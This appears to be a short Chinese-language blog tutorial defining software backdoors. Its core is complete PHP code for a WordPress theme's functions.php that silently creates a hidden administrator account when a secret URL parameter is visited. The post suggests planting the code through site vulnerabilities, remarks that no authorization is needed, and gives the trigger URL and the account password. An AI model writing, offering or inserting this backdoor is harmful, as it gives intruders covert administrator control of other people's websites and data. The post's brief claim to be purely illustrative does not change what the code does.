什么是后门?
通常指那些绕过安全性控制而获取对程序或系统访问权的程序方法。
在软件的开发阶段,程序员常常会在软件内创建后门程序以便可以修改程序设计中的缺陷。
那么光说一些概念还是不够清晰,我们上一段后门代码那么在这个代码如果我们可以在创建网站的时候,或者利用一些网站的漏洞,放在其网站的某些文件里边就可以实现后门的作用,看代码中是可以创建一个backdoor用户密码为pa55w0rd,然后把这个用户放入user里边,在进行提权,我们就获得了一个管理员权限的账户,那么其作用不言而喻。这里我们不需要授权。 这个后门是可以用在在某press创建的网站上的。
<?php
add_action( 'wp_head', 'my_backdoor' );
function my_backdoor() {
if ( md5( $_GET['backdoor'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' ) {
require( 'wp-includes/registration.php' );
if ( !username_exists( 'backdoor' ) ) {
$user_id = wp_create_user( 'backdoor', 'pa55w0rd!' );
$user = new WP_User( $user_id );
$user->set_role( 'administrator' );
}
}
}
在主题的 functions.php 文件中添加以上代码,就可以给 WordPress 添加一个能够创建管理员的后门,只需访问
http://www.yoursitename.com/?backdoor=go,然后就创建了一个用户名为“backdoor”,密码为:“pa55w0rd!” 的管理员。
这里例子来源于网络,这里仅仅作为讲解后门是什么举例。
后门在安全测试中的实际意义?
可以更方便的链接到主机 在获取到主机权限的时候,后门可以充当命令控制台的角色